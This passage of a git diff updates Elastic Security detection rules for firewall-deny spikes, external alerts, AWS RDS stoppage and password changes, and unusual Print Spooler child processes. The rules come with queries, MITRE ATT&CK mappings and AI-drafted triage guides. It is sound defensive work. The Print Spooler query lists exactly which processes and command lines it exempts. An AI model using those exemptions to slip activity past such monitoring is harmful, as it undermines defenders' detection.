"15m", + "license": "Elastic License v2", + "machine_learning_job_id": "high_count_network_denies", + "name": "Spike in Firewall Denies", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Spike in Firewall Denies\n\nFirewalls and ACLs are critical in controlling network traffic, blocking unauthorized access. Adversaries may exploit misconfigurations or launch attacks like reconnaissance or denial-of-service to overwhelm these defenses. The 'Spike in Firewall Denies' detection rule leverages machine learning to identify unusual surges in denied traffic, signaling potential misconfigurations or malicious activities.\n\n### Possible investigation steps\n\n- Review the time frame and source IP addresses associated with the spike in denied traffic to identify any patterns or anomalies.\n- Check the firewall and ACL logs for any recent changes or misconfigurations that could have led to the increase in denied traffic.\n- Investigate the destination IP addresses and ports targeted by the denied traffic to determine if they are associated with known malicious activity or if they are legitimate services.\n- Analyze the volume and frequency of the denied requests to assess whether they align with typical denial-of-service attack patterns or reconnaissance activities.\n- Correlate the denied traffic with other security alerts or logs to identify any related suspicious activities or potential indicators of compromise within the network.\n\n### False positive analysis\n\n- Routine network scans by security tools or IT teams may trigger spikes in denied traffic. Regularly review and whitelist known IP addresses or tools to prevent these from being flagged.\n- Misconfigured applications that frequently attempt unauthorized access can cause false positives. Identify and correct these configurations to reduce unnecessary alerts.\n- Legitimate but high-volume business applications might generate traffic patterns similar to reconnaissance activities. Monitor and document these applications, and create exceptions for their traffic patterns.\n- Scheduled maintenance or updates can lead to temporary spikes in denied traffic. Coordinate with IT teams to anticipate these events and adjust monitoring rules accordingly.\n- Internal network changes, such as new device deployments or network architecture updates, might cause unexpected traffic patterns. Ensure these changes are communicated and accounted for in the firewall rules to minimize false positives.\n\n### Response and remediation\n\n- Immediately isolate affected systems or segments of the network to prevent further unauthorized access or potential spread of malicious activity.\n- Analyze the denied traffic logs to identify the source IP addresses and block them at the firewall or ACL level to prevent further attempts.\n- Review and correct any misconfigurations in firewall rules or ACLs that may have contributed to the spike in denied traffic.\n- Conduct a thorough investigation to determine if the spike is related to a denial-of-service attack and, if confirmed, engage with your internet service provider (ISP) for additional support and mitigation strategies.\n- If malicious activity is suspected, escalate the incident to the security operations center (SOC) or incident response team for further analysis and response.\n- Implement additional monitoring and alerting for similar patterns of denied traffic to enhance early detection of potential threats.\n- Document the incident, including actions taken and lessons learned, to improve future response efforts and update incident response plans accordingly.", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + }, + { + "package": "network_traffic", + "version": "^1.33.0" + } + ], + "risk_score": 21, + "rule_id": "eaa77d63-9679-4ce3-be25-3ba8b795e5fa", + "setup": "## Setup\n\nThis rule requires the installation of associated Machine Learning jobs, as well as data coming in from one of the following integrations:\n- Elastic Defend\n- Network Packet Capture\n\n### Anomaly Detection Setup\n\nOnce the rule is enabled, the associated Machine Learning job will start automatically. You can view the Machine Learning job linked under the \"Definition\" panel of the detection rule. If the job does not start due to an error, the issue must be resolved for the job to commence successfully. For more details on setting up anomaly detection jobs, refer to the [helper guide](https://www.elastic.co/guide/en/kibana/current/xpack-ml-anomalies.html).\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration to your system:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Network Packet Capture Integration Setup\nThe Network Packet Capture integration sniffs network packets on a host and dissects known protocols. Monitoring the network traffic is critical to gaining observability and securing your environment \u2014 ensuring high levels of performance and security. The Network Packet Capture integration captures the network traffic between your application servers, decodes common application layer protocols and records the interesting fields for each transaction.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"network_traffic\" to your system:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cNetwork Packet Capture\u201d and select the integration to see more details about it.\n- Click \u201cAdd Network Packet Capture\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cnetwork_traffic\u201d to an existing or a new agent policy, and deploy the agent on your system from which network log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/network_traffic).\n", + "severity": "low", + "tags": [ + "Use Case: Threat Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1041", + "name": "Exfiltration Over C2 Channel", + "reference": "https://attack.mitre.org/techniques/T1041/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1046", + "name": "Network Service Discovery", + "reference": "https://attack.mitre.org/techniques/T1046/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0043", + "name": "Reconnaissance", + "reference": "https://attack.mitre.org/tactics/TA0043/" + }, + "technique": [ + { + "id": "T1590", + "name": "Gather Victim Network Information", + "reference": "https://attack.mitre.org/techniques/T1590/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1498", + "name": "Network Denial of Service", + "reference": "https://attack.mitre.org/techniques/T1498/" + }, + { + "id": "T1499", + "name": "Endpoint Denial of Service", + "reference": "https://attack.mitre.org/techniques/T1499/" + } + ] + } + ], + "type": "machine_learning", + "version": 108 + }, + "id": "eaa77d63-9679-4ce3-be25-3ba8b795e5fa_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/eb079c62-4481-4d6e-9643-3ca499df7aaa_106.json b/packages/security_detection_engine/kibana/security_rule/eb079c62-4481-4d6e-9643-3ca499df7aaa_106.json new file mode 100644 index 00000000000..350c75cc0d0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/eb079c62-4481-4d6e-9643-3ca499df7aaa_106.json @@ -0,0 +1,92 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Generates a detection alert for each external alert written to the configured indices. Enabling this rule allows you to immediately begin investigating external alerts in the app.", + "from": "now-2m", + "index": [ + "apm-*-transaction*", + "traces-apm*", + "auditbeat-*", + "filebeat-*", + "logs-*", + "packetbeat-*", + "winlogbeat-*" + ], + "interval": "1m", + "language": "kuery", + "license": "Elastic License v2", + "max_signals": 1000, + "name": "External Alerts", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating External Alerts\n\nExternal alerts are crucial for identifying potential threats across diverse environments like Windows, macOS, and Linux. These alerts are generated from various sources, excluding specific modules like endpoint or cloud defend, to focus on broader threat landscapes. Adversaries may exploit vulnerabilities in these systems to execute unauthorized actions. The 'External Alerts' detection rule filters and highlights such activities by focusing on alert events, enabling analysts to swiftly investigate and mitigate risks.\n\n### Possible investigation steps\n\n- Review the alert details to identify the specific event.kind:alert that triggered the detection, ensuring it is not associated with the excluded modules (endgame, endpoint, or cloud_defend).\n- Examine the source and context of the alert by checking the associated tags, such as 'OS: Windows', 'OS: macOS', or 'OS: Linux', to understand the environment affected.\n- Gather additional context by correlating the alert with other logs or events from the same time frame or system to identify any related suspicious activities.\n- Assess the risk score and severity level to prioritize the investigation and determine the potential impact on the organization.\n- Investigate the origin of the alert by identifying the source IP, user account, or process involved, and check for any known vulnerabilities or exploits associated with them.\n- Consult threat intelligence sources to determine if the alert corresponds to any known threat actors or campaigns targeting similar environments.\n\n### False positive analysis\n\n- Alerts from benign third-party applications may trigger false positives. Review and identify these applications, then create exceptions to exclude them from future alerts.\n- Routine system updates or patches can generate alerts. Monitor update schedules and create exceptions for known update activities to reduce noise.\n- Network monitoring tools might produce alerts due to their scanning activities. Verify these tools and exclude their activities if deemed non-threatening.\n- Alerts from internal security testing or penetration testing exercises can be mistaken for threats. Coordinate with security teams to whitelist these activities during scheduled tests.\n- Certain administrative scripts or automation tasks may trigger alerts. Evaluate these scripts and exclude them if they are part of regular operations and pose no risk.\n\n### Response and remediation\n\n- Isolate affected systems immediately to prevent further unauthorized actions and contain the threat.\n- Conduct a thorough review of the alert details to identify any specific vulnerabilities or exploits used by the adversary.\n- Apply relevant patches or updates to the affected systems to remediate any identified vulnerabilities.\n- Restore systems from a known good backup if unauthorized changes or actions have been detected.\n- Monitor network traffic and system logs closely for any signs of further suspicious activity or attempts to exploit similar vulnerabilities.\n- Escalate the incident to the appropriate security team or management if the threat appears to be part of a larger attack campaign or if additional resources are needed for remediation.\n- Enhance detection capabilities by updating security tools and configurations to better identify similar threats in the future.", + "query": "(event.kind:alert or data_stream.dataset:wiz.defend) and not event.module:(endgame or endpoint or cloud_defend)\n", + "required_fields": [ + { + "ecs": true, + "name": "data_stream.dataset", + "type": "constant_keyword" + }, + { + "ecs": true, + "name": "event.kind", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.module", + "type": "keyword" + } + ], + "risk_score": 47, + "risk_score_mapping": [ + { + "field": "event.risk_score", + "operator": "equals", + "value": "" + } + ], + "rule_id": "eb079c62-4481-4d6e-9643-3ca499df7aaa", + "rule_name_override": "message", + "setup": "## Setup\n\n### Additional notes\n\nFor information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts).\n", + "severity": "medium", + "severity_mapping": [ + { + "field": "event.severity", + "operator": "equals", + "severity": "low", + "value": "21" + }, + { + "field": "event.severity", + "operator": "equals", + "severity": "medium", + "value": "47" + }, + { + "field": "event.severity", + "operator": "equals", + "severity": "high", + "value": "73" + }, + { + "field": "event.severity", + "operator": "equals", + "severity": "critical", + "value": "99" + } + ], + "tags": [ + "OS: Windows", + "Data Source: APM", + "OS: macOS", + "OS: Linux", + "Resources: Investigation Guide" + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "eb079c62-4481-4d6e-9643-3ca499df7aaa_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_210.json b/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_210.json index bf732d4563b..26fcb0009b3 100644 --- a/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_210.json +++ b/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_210.json @@ -28,7 +28,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_207.json b/packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_207.json deleted file mode 100644 index 4b72d25ea11..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_207.json +++ /dev/null @@ -1,92 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies that an Amazon Relational Database Service (RDS) cluster or instance has been stopped.", - "false_positives": [ - "Valid clusters or instances may be stopped by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Cluster or instance stoppages from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-60m", - "index": [ - "filebeat-*", - "logs-aws.cloudtrail-*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "name": "AWS RDS Instance/Cluster Stoppage", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AWS RDS Instance/Cluster Stoppage\n\nAmazon RDS is a managed database service that simplifies database setup, operation, and scaling. Adversaries may stop RDS instances or clusters to disrupt services, potentially causing data unavailability or loss. The detection rule monitors AWS CloudTrail logs for successful stop actions on RDS resources, alerting analysts to potential unauthorized disruptions aligned with impact tactics.\n\n### Possible investigation steps\n\n- Review the AWS CloudTrail logs to identify the user or role associated with the StopDBCluster or StopDBInstance action to determine if the action was authorized.\n- Check the event time and correlate it with any scheduled maintenance or known operational activities to rule out legitimate stoppage.\n- Investigate the source IP address and location from which the stop action was initiated to identify any anomalies or unauthorized access.\n- Examine the AWS IAM policies and permissions associated with the user or role to ensure they align with the principle of least privilege.\n- Look for any related alerts or logs around the same timeframe that might indicate a broader security incident or unauthorized access attempt.\n- Contact the relevant database or application owner to confirm whether the stoppage was planned or expected.\n\n### False positive analysis\n\n- Routine maintenance activities may trigger stop actions on RDS instances or clusters. To manage this, create exceptions for scheduled maintenance windows by excluding events occurring during these times.\n- Development and testing environments often involve frequent stopping and starting of RDS instances. Identify and exclude these environments from alerts by using tags or specific instance identifiers.\n- Automated scripts or tools used for cost-saving measures might stop RDS instances during off-peak hours. Review and whitelist these scripts by verifying their source and purpose.\n- User-initiated stop actions for legitimate reasons, such as troubleshooting or configuration changes, can be excluded by maintaining a list of authorized personnel and their activities.\n- CloudFormation or other infrastructure-as-code tools may stop RDS instances as part of deployment processes. Exclude these actions by identifying and filtering events associated with these tools.\n\n### Response and remediation\n\n- Immediately verify the legitimacy of the stop action by reviewing the associated CloudTrail logs, focusing on the user identity, source IP, and time of the event to determine if the action was authorized.\n- If unauthorized, isolate the affected RDS instance or cluster by disabling any associated IAM user or role that performed the stop action to prevent further unauthorized access.\n- Restore the RDS instance or cluster from the latest backup or snapshot to minimize data unavailability and ensure service continuity.\n- Conduct a root cause analysis to identify how the unauthorized stop action was executed, focusing on potential security gaps in IAM policies or network configurations.\n- Implement additional security measures, such as enabling multi-factor authentication (MFA) for all IAM users and roles with permissions to stop RDS instances or clusters.\n- Escalate the incident to the security operations team for further investigation and to determine if additional systems or data were impacted.\n- Update the incident response plan to include lessons learned from this event, ensuring quicker and more effective responses to similar threats in the future.", - "query": "event.dataset:aws.cloudtrail and event.provider:rds.amazonaws.com and event.action:(StopDBCluster or StopDBInstance) and event.outcome:success\n", - "references": [ - "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/rds/stop-db-cluster.html", - "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_StopDBCluster.html", - "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/rds/stop-db-instance.html", - "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_StopDBInstance.html" - ], - "related_integrations": [ - { - "integration": "cloudtrail", - "package": "aws", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d", - "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS RDS", - "Use Case: Asset Visibility", - "Tactic: Impact", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0040", - "name": "Impact", - "reference": "https://attack.mitre.org/tactics/TA0040/" - }, - "technique": [ - { - "id": "T1489", - "name": "Service Stop", - "reference": "https://attack.mitre.org/techniques/T1489/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_215.json b/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_215.json new file mode 100644 index 00000000000..5a680d9e043 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_215.json @@ -0,0 +1,139 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects unusual Print Spooler service (spoolsv.exe) child processes. This may indicate an attempt to exploit privilege escalation vulnerabilities related to the Printing Service on Windows.", + "false_positives": [ + "Install or update of a legitimate printing driver. Verify the printer driver file metadata such as manufacturer and signature information." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "logs-system.security*", + "logs-windows.forwarded*", + "winlogbeat-*", + "logs-crowdstrike.fdr*", + "logs-sentinel_one_cloud_funnel.*", + "logs-m365_defender.event-*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Print Spooler Child Process", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Unusual Print Spooler Child Process\n\nThe Print Spooler service, integral to Windows environments, manages print jobs and interactions with printers. Adversaries may exploit vulnerabilities in this service to escalate privileges, gaining unauthorized access or control. The detection rule identifies suspicious child processes spawned by the Print Spooler, excluding known legitimate processes, to flag potential exploitation attempts, focusing on unusual command lines and integrity levels.\n\n### Possible investigation steps\n\n- Review the process details to identify the unusual child process spawned by spoolsv.exe, focusing on the process name and command line arguments to understand its purpose and potential malicious intent.\n- Check the integrity level of the process using the fields process.Ext.token.integrity_level_name or winlog.event_data.IntegrityLevel to confirm if it is running with elevated privileges, which could indicate an exploitation attempt.\n- Investigate the parent-child relationship by examining the process tree to determine if there are any other suspicious processes associated with the same parent process, spoolsv.exe.\n- Cross-reference the process executable path against known legitimate software paths to ensure it is not a false positive, especially if the executable is not listed in the exclusion paths.\n- Analyze recent system logs and security events around the time of the alert to identify any other anomalous activities or patterns that could be related to the potential exploitation attempt.\n- If the process is confirmed suspicious, isolate the affected system to prevent further exploitation and conduct a deeper forensic analysis to understand the scope and impact of the incident.\n\n### False positive analysis\n\n- Legitimate print-related processes like splwow64.exe, PDFCreator.exe, and acrodist.exe may trigger alerts. These are excluded in the rule to prevent false positives.\n- System processes such as msiexec.exe, route.exe, and WerFault.exe are known to be legitimate child processes of the Print Spooler and are excluded to reduce false alerts.\n- Commands involving net.exe for starting or stopping services are common in administrative tasks and are excluded to avoid unnecessary alerts.\n- Command-line operations involving cmd.exe or powershell.exe that reference .spl files or system paths are often legitimate and are excluded to minimize false positives.\n- Network configuration changes using netsh.exe, such as adding port openings or rules, are typical in network management and are excluded to prevent false alerts.\n- Registration of PrintConfig.dll via regsvr32.exe is a known legitimate operation and is excluded to avoid false positives.\n- Executables from known paths like CutePDF Writer and GPLGS are excluded to prevent alerts from common, non-threatening applications.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further exploitation or lateral movement by the adversary.\n- Terminate any suspicious child processes spawned by the Print Spooler service that do not match known legitimate processes or command lines.\n- Conduct a thorough review of the system's security logs to identify any unauthorized access or privilege escalation attempts related to the Print Spooler service.\n- Apply the latest security patches and updates to the Windows operating system and specifically to the Print Spooler service to mitigate known vulnerabilities.\n- Restore the system from a clean backup if any unauthorized changes or malicious activities are confirmed.\n- Monitor the system closely for any recurrence of similar suspicious activities, ensuring enhanced logging and alerting are in place for spoolsv.exe and its child processes.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to assess the potential impact on other systems within the network.", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"spoolsv.exe\" and process.command_line != null and\n (?process.Ext.token.integrity_level_name : \"System\" or ?winlog.event_data.IntegrityLevel : \"System\") and\n\n /* exclusions for FP control below */\n not process.name : (\"splwow64.exe\", \"PDFCreator.exe\", \"acrodist.exe\", \"spoolsv.exe\", \"msiexec.exe\", \"route.exe\", \"WerFault.exe\") and\n not process.command_line : \"*\\\\WINDOWS\\\\system32\\\\spool\\\\DRIVERS*\" and\n not (process.name : \"net.exe\" and process.command_line : (\"*stop*\", \"*start*\")) and\n not (process.name : (\"cmd.exe\", \"powershell.exe\") and process.command_line : (\"*.spl*\", \"*\\\\program files*\", \"*route add*\")) and\n not (process.name : \"netsh.exe\" and process.command_line : (\"*add portopening*\", \"*rule name*\")) and\n not (process.name : \"regsvr32.exe\" and process.command_line : \"*PrintConfig.dll*\") and\n not process.executable : (\n \"?:\\\\Program Files (x86)\\\\CutePDF Writer\\\\CPWriter2.exe\",\n \"?:\\\\Program Files (x86)\\\\GPLGS\\\\gswin32c.exe\",\n \"?:\\\\Program Files (x86)\\\\Acro Software\\\\CutePDF Writer\\\\CPWSave.exe\",\n \"?:\\\\Program Files (x86)\\\\Acro Software\\\\CutePDF Writer\\\\CPWriter2.exe\",\n \"?:\\\\Program Files (x86)\\\\CutePDF Writer\\\\CPWSave.exe\",\n \"?:\\\\Program Files (x86)\\\\TSplus\\\\UniversalPrinter\\\\CPWriter2.exe\",\n \"?:\\\\Program Files\\\\Seagull\\\\Printer Drivers\\\\Packages\\\\*\\\\DriverEnvironmentSetup.exe\",\n \"?:\\\\Windows\\\\system32\\\\CNAB4RPD.EXE\",\n\n /* Crowdstrike specific condition as it uses NT Object paths */\n \"\\\\Device\\\\HarddiskVolume*\\\\Program Files (x86)\\\\CutePDF Writer\\\\CPWriter2.exe\",\n \"\\\\Device\\\\HarddiskVolume*\\\\Program Files (x86)\\\\GPLGS\\\\gswin32c.exe\",\n \"\\\\Device\\\\HarddiskVolume*\\\\Program Files (x86)\\\\Acro Software\\\\CutePDF Writer\\\\CPWSave.exe\",\n \"\\\\Device\\\\HarddiskVolume*\\\\Program Files (x86)\\\\Acro Software\\\\CutePDF Writer\\\\CPWriter2.exe\",\n \"\\\\Device\\\\HarddiskVolume*\\\\Program Files (x86)\\\\CutePDF Writer\\\\CPWSave.exe\",\n \"\\\\Device\\\\HarddiskVolume*\\\\Program Files (x86)\\\\TSplus\\\\UniversalPrinter\\\\CPWriter2.exe\",\n \"\\\\Device\\\\HarddiskVolume*\\\\Program Files\\\\Seagull\\\\Printer Drivers\\\\Packages\\\\*\\\\DriverEnvironmentSetup.exe\",\n \"\\\\Device\\\\HarddiskVolume*\\\\Windows\\\\system32\\\\CNAB4RPD.EXE\"\n )\n", + "references": [ + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "system", + "version": "^2.0.0" + }, + { + "package": "crowdstrike", + "version": "^2.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.9.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.IntegrityLevel", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ee5300a7-7e31-4a72-a258-250abb8b3aa1", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Elastic Endgame", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 215 + }, + "id": "ee5300a7-7e31-4a72-a258-250abb8b3aa1_215", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f0cc239b-67fa-46fc-89d4-f861753a40f5_4.json b/packages/security_detection_engine/kibana/security_rule/f0cc239b-67fa-46fc-89d4-f861753a40f5_4.json index 716a834e2f6..b2f5cefc82d 100644 --- a/packages/security_detection_engine/kibana/security_rule/f0cc239b-67fa-46fc-89d4-f861753a40f5_4.json +++ b/packages/security_detection_engine/kibana/security_rule/f0cc239b-67fa-46fc-89d4-f861753a40f5_4.json @@ -20,7 +20,7 @@ }, { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/f1a6d0f4-95b8-11ed-9517-f661ea17fbcc_6.json b/packages/security_detection_engine/kibana/security_rule/f1a6d0f4-95b8-11ed-9517-f661ea17fbcc_6.json index cd4a07f2618..df4deae8d63 100644 --- a/packages/security_detection_engine/kibana/security_rule/f1a6d0f4-95b8-11ed-9517-f661ea17fbcc_6.json +++ b/packages/security_detection_engine/kibana/security_rule/f1a6d0f4-95b8-11ed-9517-f661ea17fbcc_6.json @@ -27,7 +27,7 @@ "related_integrations": [ { "package": "google_workspace", - "version": "^2.31.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/f2015527-7c46-4bb9-80db-051657ddfb69_6.json b/packages/security_detection_engine/kibana/security_rule/f2015527-7c46-4bb9-80db-051657ddfb69_6.json new file mode 100644 index 00000000000..c1e5c8565ad --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f2015527-7c46-4bb9-80db-051657ddfb69_6.json @@ -0,0 +1,140 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the modification of the master password for an AWS RDS DB instance or cluster. Changing the master password is a legitimate recovery action when access is lost, but adversaries with sufficient permissions may modify it to regain access, establish persistence, bypass existing controls, or escalate privileges within a compromised environment. Because RDS does not expose the password in API responses, this operation can meaningfully alter access pathways to sensitive data stores.", + "event_category_override": "event.type", + "false_positives": [ + "Master password modification may occur during legitimate administrative recovery (e.g., a lost password, rotation event, or Secrets Manager reassociation). Validate whether the change was expected, approved, and performed by authorized personnel. If known workflows routinely perform this action, consider adding targeted exceptions." + ], + "from": "now-6m", + "index": [ + "filebeat-*", + "logs-aws.cloudtrail-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "user.name", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "aws.cloudtrail.user_identity.access_key_id", + "target.entity.id", + "event.action", + "event.outcome", + "cloud.account.id", + "cloud.region", + "aws.cloudtrail.request_parameters", + "aws.cloudtrail.response_elements" + ] + }, + "language": "eql", + "license": "Elastic License v2", + "name": "AWS RDS DB Instance or Cluster Password Modified", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. \n> While every effort has been made to ensure its quality, validate and adapt it to suit your operational needs.\n\n### Investigating AWS RDS DB Instance or Cluster Password Modified\n\nThe RDS master user password controls privileged access to a database instance or cluster. Modifying it can immediately shift access from one operator to another, break application functionality, or allow an adversary to regain control over a compromised DB instance. Because RDS never returns the password via API, this operation is a strong 